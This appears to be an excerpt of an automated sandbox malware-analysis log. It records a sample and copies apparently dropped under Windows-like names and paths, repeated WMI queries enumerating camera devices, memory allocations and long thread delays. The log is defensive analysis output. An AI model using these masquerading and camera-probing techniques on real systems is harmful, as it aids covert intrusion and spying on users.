Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: 2480000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: 1A640000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Memory allocated: D10000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Memory allocated: 1A970000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Memory allocated: 19C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Memory allocated: 1B350000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: 3190000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: 1B3A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: 1400000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: 1B170000 memory reserve | memory write watch
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Memory allocated: 1900000 memory reserve | memory write watch
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Memory allocated: 1B320000 memory reserve | memory write watch
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Memory allocated: 1A70000 memory reserve | memory write watch
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Memory allocated: 1B4F0000 memory reserve | memory write watch
Source: C:\Users\Default\SystemSettings.exe Memory allocated: D60000 memory reserve | memory write watch
Source: C:\Users\Default\SystemSettings.exe Memory allocated: 1AAC0000 memory reserve | memory write watch
Source: C:\Users\Default\SystemSettings.exe Memory allocated: 1860000 memory reserve | memory write watch
Source: C:\Users\Default\SystemSettings.exe Memory allocated: 1E90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: A80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\lv961v43L3.exe Memory allocated: 1A7F0000 memory reserve | memory write watch
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Memory allocated: 1180000 memory reserve | memory write watch
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Memory allocated: 1AE50000 memory reserve | memory write watch
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Memory allocated: 3260000 memory reserve | memory write watch
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Memory allocated: 1B480000 memory reserve | memory write watch
Source: C:\Users\Default\SystemSettings.exe Memory allocated: 2B60000 memory reserve | memory write watch
Source: C:\Users\Default\SystemSettings.exe Memory allocated: 1AD40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\lv961v43L3.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\lv961v43L3.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\SystemSettings.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\SystemSettings.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\lv961v43L3.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 600000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599844
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599641
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599344
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 3600000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599156
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 599016
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598891
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598778
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598633
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598516
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598406
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598297
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598188
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Thread delayed: delay time: 598053
